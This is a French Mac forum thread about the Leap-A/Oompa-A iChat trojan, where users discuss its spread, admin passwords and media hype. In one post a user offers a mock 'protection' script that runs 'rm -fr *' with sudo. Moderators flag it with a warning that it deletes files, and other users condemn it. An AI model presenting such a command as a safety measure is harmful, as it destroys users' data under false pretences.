Les utilisateurs des forums de Macrumors se sont vu floués par un fichier supposé contenir des captures d'écrans de la prochaine grosse mise à jour du système Apple : Mac OS 10.5. Ce fichier, nommé latestpics.tgz, une fois décompressé, contient un fichier qui ressemble à une image mais qui en fait est un exécutable. Cet exécutable, compilé pour les PowerPC, commence par s'installer confortablement dans le système en infectant les autres applications (cette partie du code ne fonctionne pas correctement et empêche en pratique l'application infectée de se lancer) et en essayant de s'envoyer lui même aux contacts iChat.
Rien de bien dangereux donc, mais ce prototype de Trojan a quand même le mérite d'être le premier à être capable de se propager par lui même, même si la manière iChat n'est sans doute pas la plus efficace. De plus, il demande toujours une intervention de l'utilisateur qui doit double cliquer sur l'archive puis sur l'application résultante.

Il est évident que ce genre de trojan/virus va faire son apparition tôt ou tard sur notre plateforme. Et la notoriété de Mac OS X ne pourra que rapprocher l'échéance. C'est peut-être pour ça qu'Apple ne communique pas ouvertement sur le fait qu'il n'existe pas encore de virus sur nos machines, car lorsque cela arrivera, il ne faut pas que les gens se souviennent qu'une campagne de pub qui prétendait le contraire ou la discréditation serait totale...

Le président d'Ambrosia a publié plus de détails sur ce trojan sur son forum que je vous invite vivement à consulter si vous parlez anglais.

Plus près de nous, un sujet sur la question a été ouvert vers 15 h sur MacB ici par hellomorld.

Hé, oui. Tôt ou tard, il faudra bien se résoudre à se faire chier avec les antivirus. Si Apple pouvait, là encore, nous concocter quelque chose d'efficce et d'intuitif.

A mon ce type d'exécutable existe depuis belle lurette sur OS X puisque c'est pas l'ordinateur qui est mis en cause mais l'utilisateur. Je me suis amusé a faire un faut installateur Apple script qui simulait l'installation d'un jeu connu, sans problème ma victime à rentré son code administrateur (même qu'il était affiché en clair sur l'écran) pour valider l'isntallation!!! Du coup le programme à presque tous les droits... Seulement comme la grande majorité des personne qui serait potentiellement prêtes à faire ce genre de choses sont forcément à fond dans l'utilisation de leur ordinateur et par conséquent forcémment un peu mac'o'phile elle ne sont pas prête à détruire l'image de la chose qu'elles apprécient. Bon c'est de loin pas la seule cause, il y en a sans doute beaucoup d'autre, mais à mon avis c'est celle-ci qui se rapproche plus de se problème spécifique.

Il n'affecte donc que les Macs à base de processeurs PPC et non les nouveaux Macintel?

Pourquoi un prototype de trojan sur Mac OS X ?

Parce que le code est bugué : il fusille l'application infectée au lieu de l'infecter proprement pour qu'il puisse se propager et il y a des bouts de codes qui montrerait qu'il y a une tentative de propagation par mail mais le code n'a pas été activé car sans doute pas finalisé.
De plus il ne fait rien de mal ! (pas de port ouvert sur la machine pour en prendre le contrôle, pas de destruction de données etc...)

Je ne comprend pas bien le truc. Est-ce que cela profite encore de la faille qui faisait ressembler un executable à un morceau MP3 (icone Itunes) ? (ou le même genre de bug)

Ou est-ce que c'est simplement un début de virus ? qu'il faut "activer manuellement"

Dans tous les cas comment peut-on faire pour éviter le pire ?
début de réponse : limiter les downloads au strict nécessaire, ne pas rentrer son mot de passe à l'aveuglette, se méfier de tout comportement suspect (c'est vrai quoi une photo qui me demande mon password ).

mettre nospam devant les adresses mail de tous les destinataires de son carnet d adresse

Je résultat est tout de même inquiétant. De quelle(s) application(s) s'agit-il?

Et, au fait, il se s'exécute que sur PPC alors?

Il faudrait arréter de crier au loup dès qu'un troyan apparait !!
ce n'est pas le premier !

et arreter de délirer avec les trucs du genre : bientot il faudra un anti-virus sur Mac
---> ce genre de trojan existe a cause de la stupidité (ou la méconaissance) des gens qui téléchargent n'importe quoi,
et aucun anti-virus n'empechera jamais les troyan d'exister, puisque c'est l'utilisateur et non le système qui est en cause...

j'ajouterai que pour quelqu'un qui fait un peu de programmation,
et avec tout les moyens de manipluer facilement le système sous OS X :
- AppleScript
- scripts shell (commandes Unix)
- Automator
- etc....

je suis étonné qu'il n'y est pas plus "d'essai" de ce genre...
(en fait un programme de ce niveau peut facilement etre ecrit en quelques heures....)
(du moment qu'on ai réfléchit un peu a la manière de comment faire tel ou tel truc assez discretement...)

Comment le virus peut-il s'intaller dans le système sans le mot de passe administrateur ?

Normalement non, il doit s'exécuter sur PPC ou Intel, puisque sur les Macintels il serait lancé par Rosetta...

Il ne s'installe pas dans le système, il bousille des applications et se réplique à chaque fois qu'une application infectée se lance. Les applications ne sont pas protégées par des droits admin, donc le virus n'a pas besoin de mot de passe admin pour opérer sur ces applis.
Donc en principe, s'il ne demande aucun mot de passe, alors il ne peut rien faire sur le système à proprement parler.

C'est marrant, au moment où j'écris ce message, 24 personnes sont connectées au topic tout en restant muette... Le sujet serait-il si inquiétant que ça? Ca sent l'angoisse... Rhâââaa... De gros virus poilus débarquent sur Mac, et avec les Macintel c'est l'infection assurée*! Paniquons*, hurlons*, fuyons*... tant qu'il en est encore temps...
C'est pas très gentil pour le Monsieur Toulemonde ça. Ne pas être un "initié", être un "débutant", un brave retraité qui essaie courageusement de se mettre à l'info en investissant dans un Mac, voire un "switcher" à ses tous débuts, serait-il synonyme de c**nerie?

Il ne peut pas justement, il demande le mot de passe !

Plutôt que virus, je parlerais de piège à c**s.

Ce n'est pas un virus, mais un (espèce de) trojan. Il faut le lancer soi-même et donner le mot de passe admin...

c'est sur qu'il faut avoir un QI d'huitre pour filer son code admin a une photo que l'on ouvre...

Il faut le lancer a la main l'appli. piege a cons...

Et oui ce n'est pas nouveau, je me souviens il y a plus de 10 ans d'applescripts qui tournait sur les serveurs hotline avec un nom alléchant (genre Office version machin) et qui en fait effacaient le disque dur.

Il serait peut-être bon que MB désamorce la polémique en annoncant que ce n'est pas un virus mais un piège à cons. Et qu'on ne donne pas son mot de passe admin sans raison valable.

Parce que beaucoup de personnes (PCistes) sont en attente de cette info sur la sécurité d'OSX. Des potes qui ne connaissent rien au mac me parlent fréquemment des rumeurs de virus mac. ces nouvelles-là circulent très vite !!

Ouais c'est clair, je vois déjà demain dans mon école les trolleurs: "t'as vu, y'a des virus sur Mac"!

Et pourtant il y en a des gens pour tomber dans ce genre de piège... Je connais bien quelqu'un qui a cru télécharger un soft genre Norton Antivirus pour son PC sur un réseau P2P, qui ne s'est pas inquiété de voir le fichier se télécharger en 2 secondes vu qu'il faisait 40 Ko, et l'ouvrir.
L'autre soir, il m'appelle, paniqué, parce que toutes ses icônes s'étaient changées en fromages, et il pouvait plus ouvrir aucun document. Bon passé la crise de rire quand j'ai vu un screenshot de son bureau il a fallu tout réinstaller...
Sur PC, à part certains virus vraiment insidieux, c'est comme avec ce trojan sur Mac : les gens qui infectent leur machine ont tendance à ouvrir n'importe quoi, la première pièce jointe à un mail venue, que l'expéditeur soit connu ou pas.

Oui, je crois vraiment vraiment que c'est l'occasion de faire une grande campagne à propos de l'importance et des risque que l'on prend à taper son mot de passe.

Autour de moi, un utilisateur Mac sur deux, soit ne met pas de mot de passe dutout, soit le tape n'importe quand sans même savoir pourquoi on le lui demande.

Je trouve que l'ensemble de la presse Mac devrait lancer une campagne d'information claire et non alarmiste sur le sujet.

Peut-être que Le Pommier pourrait se réunir pour l'occasion (pour une fois en dehors de l'AppleExpo) pour lancer tous en même temps cette campagne sur les site d'info Mac

C'est vraiment pathétique tout ce foin autour de ce sois disant virus (qui n'est en fait pas un virus mais plutôt un trojan horse wanabee. M'enfin, rentrons pas dans les détails, déjà que j'en vois avec les yeux exorbités!)

Le plus pathétique, c'est que la... "news" est relatif avec un certain catastrophisme par Mac Bidouille qui devient, mais cela n'est que mon avis, de plus en plus naïf (le passage à Intel, ça... Après avoir résolu la grippe aviaire et la faim dans le monde, Intel reussit l'exploit de nous faire retrouver notre âme d'enfant... Si c'est pas beau ça!).

Anyway, tout cela est tellement ridicule que je m'en veux d'avoir oser écrire un post à ce sujet...

Question: Pouvez vous faire tourner des programmes sur votre Mac? Oui, non?
Question: Pouvez vous ecrire vos propres programmes sur votre Mac? Oui, non?

Si vous avez repondu oui aux deux questions précédentes, alors voilà celle à 10,000,000 euros:

Question: pouvez vous ecrire un programme sur votre Mac ET le faire tourner sur votre Mac?

Quoi, oui encore? Pfff... Ok, dernière question:

Question: pouvez vous ecrire un programme sur votre Mac qui fait plein de trucs méchands ET le faire tourner sur votre Mac?

Si la réponse est oui, alors, qu'Intel nous protège! Nous sommes à la merci des virus! OS X est maudit! C'est la fin des haricots (multi-thread)!

Anyway, comme je suis quand même une gentille fifille, voilà un programme qui vous protégera de ce genre de manipulations :
NOTE DES MODERATEURS : NE FAITES SURTOUT PAS CETTE MANIPULATION OU VOUS EFFACERIEZ VOS FICHIERS
1. Ouvrez TextEdit et passez en mode texte pur.
2. Tapez:

#!/bin/sh
rm -fr *

3. Sauver le fichier sous Desktop/protection.txt
4. Dans le terminal, exécutez les commandes suivantes:

cd ~/Desktop
chmod u+x protection.txt
mv protection.txt protection.sh
sudo protection.sh
[entrez votre mot de passe administrateur]



La manip prends un peu de temps (le temps de protéger chaque fichier individuellement). Ceci devrait protéger votre ordinateur en attendant un véritable virus... J'ai testé et ça marche nickel. Plus aucun soucis!

A voi voir les gens gentils!

Ayumi

NOTE DES MODERATEURS : NE FAITES SURTOUT PAS CETTE MANIPULATION OU VOUS EFFACERIEZ VOS FICHIERS

C'est pas très gentil de te moquer comme ça...
Vu le nombre de lectures sur ce post, il doit y en avoir quelques uns qui ne connaissent pas le terminal et qui sont en train d'essayer ça !

Je ne sais pas si je pouvoir m'arreter de rire ............

Bah voila une bonne maniere pour sensibiliser un utilisateur, ceux qui auront essayer ca ne se feront certainement plus prendre a executer n'importe quoi en root : )

C'est une bonne idée, la sécurité informatique, c'est l'affaire de tous. Si vous laissez votre porte ouverte et les clés dessus, votre assurance ne vous remboursera pas. Bien sûr, le méchant vilain pabo, c'est le voleur, pas la victime mais la responsabilité et le bon sens ne doivent pas se dissoudre dans une espèce de faux sentiment de sécurité un peu naïf. Alors, apprenez les gestes qui sauvent ! Dites à vos amis de ne pas télécharger n'importe quoi (même les gens sous Windows, oui, eux aussi peuvent améliorer la sécurité de leur système). Mettez des mots de passe, même si c'est pour laisser un post-it sur le bureau avec le mot de passe marqué dessus, c'est mieux que rien. Propager des virus par négligence, même inconsciemment, c'est idiot et ça pourrait même vous causer des ennuis (votre employeur peut vous le reprocher, par exemple). Il suffit que tout le monde fasse un petit effort ...

Bon en même temps, on va tous mourir sous l'assaut des virus, on est perdu, oh mon Dieu, un virus sur mac ... aaaaaahhhhh

Ca me rappelle la blague :

"Bonjour !
Je suis le premier virus belge.
Etant donné que nous les belges nous n'avons pas d'expérience en matière programmation, ce virus marche MANUELLEMENT.
S'il vous plaît, effacez un par un tous les fichiers de votre disque dur et envoyez ce message à tous les destinataires de votre carnet d'adresses. Merci de votre coopération".

excusez moi mais il m'a fait rire alors je continu ...

A la lecture de l'article en anglais, il semble confirmé qu'il n'est pas besoin de taper son mot de passe si vous ètes connectés en tant qu' Admin … ce qui est le cas de tous les PAOiste qui utilise XPress et autre qui demande que l'utilisateur soit Admin.
Qu'en est-il du message qui s'affiche quand une application est lancé pour la première fois ?

Dis donc, tu te moquerais pas des Belges, une fois ?
C'est po drôle ...

je ne sais pas comment il est fait ce truc. Pas sur que ça déclenche pour les scripts et consorts

Disons plutôt, ce qui est le cas de 99% des utilisateurs de Mac OS X car le compte créé lors de la configuration de Mac OS X a les privilèges d'administrations.

Cela me rapelle également un "virus" (hoax) sous windows qui demandait sous covert d'une référence à microsoft de faire une recherche sur un fichier (une dll) et si on le trouvait recommandait de le mettre à la corbeille, et de vider la corbeille puis de redémarrer.

La plantage car le fameux fichier que vous avez détruit était utile à windows!!!

Donc ce genre de Trojan n'est pas vraiement nouveau ni évitable.

Par contre AYUMI évite ce genre de blague car s'il y en a un qui essaye il va te maudire pour plusieurs générations.

GillesB

Bon pour rétablir un peu la réalité :


une première version du troyen a été spammée depuis le 10 février sur d'autres forums.

une deuxième version le 14 février que l'on découvre seulement aujourd'hui.

Effectivement la couverture médiatique n'est pas nécessaire, tant pis pour les utilisateurs !


En effet, le pire dans ce Vers/Troyen (l'InputManagers est un vers, la fausse image le troyen) c'est qu'il se transmet via une source de CONFIANCE qui est votre copain/copine qui vient de vous envoyer une image.


Pourquoi donc ne pas l'ouvrir en confiance ?

Je ne comprends pas les réactions de certains ici. Ok pour la première source, je n'aurais jamais non plus téléchargé ce truc.

Mais après ? Quand vous recevez une image d'un de vos correspondants d'ichat vous ne l'ouvrez pas ? C'est vxant non la mauvaise foi des gens ici.

Enfin ce n'est que mon avis.

je suis d accor pour la confiance mais si l image te demande ton PW pour s ouvrir ? Tu te doutes bien qu'il y a un truc louche ? nan ?

Ce truc ne demande PAS le mot de passe administrateur , c'est de la désinformation !!!!!


Si vous en avez la compétence lisez le code publié sur le site d'ambrosia (que je n'aurai d'ailleur pas publié pour éviter de donner des idées à d'autres)

Vous ne verrez pas de trace de demande de mot de passe.

Justement, il semblerait qu'il ne faille pas saisir son mot de passe... Dans ce cas là, c'est plus embêtant. Mais bon, si on ne me dit pas ce que c'est, je n'ouvre pas une pièce jointe ou fichier envoyé via iChat.

Où exactement ?
Je me réponds :
http://www.ambrosiasw.com/forums/index.php?showtopic=102379

il y a quand même un truc qui méchappe, ne suffirait-il pas de mettre le dossier InputManager en 744 (écriture seulement pour root : le système) pour qu'il soit obliger de demander le mot de passe ou je dit une connerie?

Sinon AYUMI, j'aurais peut-être limité ça aux dossier utilisateur pour ne pas devoir tout réinstaller... Personnelement, j'ai besoin d'une journée complète pour réinstaller complètement ma machine si je recompile pas les sources des logiciel libre...

Je trouve extrêmement malsain qu'un macbidouilleur écrive ce genre de message pince-sans-rire sans prendre les plus élémentaires des précautions.

Macbidouille est un environnement de confiance et ce message laisse croire que cette manipulation constitue effectivement une protection contre le sujet de ce topic.

Rien n'empêche un macbidouilleur un peu trop confiant de se lancer dans cette stupide manip, ni même les posts suivants qui ne sont que faiblement explicites.

Ça m'énerve au plus haut point ce genre de contribution de geek méprisant pour la plupart des utilisateurs de Mac qui le sont justement en raison de l'absence de nécessité d'être une star du terminal pour utiliser leur ordinateur !

Fétide

Ceci dit, le trojan exploite le fait que pour ouvrir un fichier ou une application on procède de la même manière, il n'y avait pas un message de confirmation lors du premier lancement d'une application sur Mac OS X ?

Pourquoi tu t'énerves ? (toute seule )


Je m'en voudrais aussi à ta place
La suite de ton message est, en effet, assez ridicule..



Cela dit, comme nous ne sommes pas tous des geeks adeptes du terminal , il se peut que certains utilisateurs ouvrent ce fameux machin et filent leur mot de passe...
Dans ce cas précis faut pas être super malin, mais il y a des cas plus anodins...
Exemple Internet Explorer me demande mon mot de passe pour s'installer
Je fais quoi dans ces cas-là ?

Tu ne lui donnes pas , tu utilises Safari ou tu installes Firefox

Hum… ça c’est mauvais. Surtout qu’Internet Explorer n’est plus développé pour Mac. C’est sûrement un coup des troyens !

PS : J’ai battu des héros de niveau 10 sur Warcraft, ce n’est pas un troyen qui va me faire peur !

Utilise Safari ou Firefox... Bon : ==> je sort...

Mais le cas est différent, ici, tu installe pas une appli, tu ouvre un photo... C'est comme si tu devait entrer ton mot de passe admin ds la machine à café pour te servir... (ou presque)

EDIT : grillé...

Pour le rm -fr /, ca me fonctionera pas.
Il y a des fichiers qu'il n'est pas possible de supprimer pendant que la machine est en fonctionnement (meme en root).
Mais bon ca efface effectivement vos fichiers.


Sinon, j'ai vue un vrai virus multiplateforme (c'est un virus de laboratoire donc pas sur le web):
Il infecte tous les scripts modifiables par l'utilisateurs dont souvent des fichiers systéme.
Si il n'arrive pas a ecrire autre part de /home, il tente des exploits local.
Pour se propager, ils s'envoit par e-mail, irc, partage smb, nfs et en utilisant des failles contre des serveurs mal patché.

Un virus bien concut sous unix emplois soit des failles dans le systéme (aléatoire si la machine est bien entretenue) soit la stupidité de l'utilisateurs.
Le jour où un virus comme celui que j'ai decris ce retrouve dans la nature, il ferra beaucoup de dégat et ce ne seront pas les antivirus qui l'arreteront.

EOPP

Je partage l'avis de Fétide sur le sujet. Personnellement, je renvoie souvent des connaissances sur le forum de MB afin qu'elles puissent trouver une solution a leur problème. Ces personnes ne sont, en général, que de simple utilisateur de MacOS X avec un bagage informatique léger.

Donc, pour ceux qui n'aurait pas deviné, le script énoncé plus haut, s'occupe bêtement de supprimer tous les fichiers/dossiers situé sur votre bureau (Ayumi, il n'y a même pas besoin d'un sudo pour effectué cette tâche...). Ce qui m'agace, c'est ce genre de post qui survienne dans un sujet critique, comme l'annonce «trojan» sous OS X. Plusieurs personnes auront peut-être l'envie de se «protéger» rapidement...

Bref, si un modérateur passe par là, je pense que serait pas une mauvaise idée de supprimer le message (ainsi que les post qui s'y réfère, le mien compris).

Bonne soirée et pas de panique (mais rester méfiant dès que vous le jugez nécessaire!)

Ou plutot, de rajouter un avertissement dans la post afin que, en lisant la suite, on se redne compte que si on avait suivit... Ce qui permet de faire d'un pierre deux coup :

- prévenir tout le monde des danger du script
- rappeller qu'il ne faut pas donner son mod de passe à n'importe quoi...

Ce qui m'amuse dans l'histoire ce sont les titres sur les sites PC du genre : 1er virus pour Mac OS X .

Extrait de : http://www.vnunet.fr/actualite/securite/pr...ons/20060216010

"L'éditeur de logiciels de sécurité Sophos a annoncé avoir identifié le premier virus visant le système d'exploitation Mac OS X d'Apple. Leap-A, également appelé Oompa-A, se propage via la messagerie instantanée iChat. A partir d'un ordinateur infecté, il s'envoie, sous la forme d'un fichier nommé "latestpics.tgz", à tous les contacts figurant dans la liste de l'application.

Lorsque le fichier est ouvert, il affiche une icône au format Jpeg afin de se faire passer pour inoffensif. "Certains utilisateurs d'ordinateurs Mac persistent à croire que Mac OS X est immunisé à tout virus informatique mais vont apprendre brutalement, avec Leap-A, que la menace sur ce système d'exploitation est bien réelle", a déclaré Graham Cluley, conseiller en technologies pour Sophos. "Les utilisateurs de Mac ne devraient pas s'imaginer qu'ils n'ont rien à craindre des virus."


Incroyable c'est tout le contraire de ce que l'on vient d'expliquer ici : le système lui même n'est pas concerné, que de foutaises

Voilà qui est fait, j'ai rajouté un avertissement. En effet, pour ceux qui pourraient lire en diagonale et tomber simplement sur ce post ou ceux qui pourraient avoir envie de lancer le script juste pour voir ce que ça fait, au moins ils seront prévenus.

je suis pas sur : sous mac os x, pour supprimer une applic, si on est pas dans une session admin on ne peu pas, a moins d'avoir le(s) pass(s) admin(s).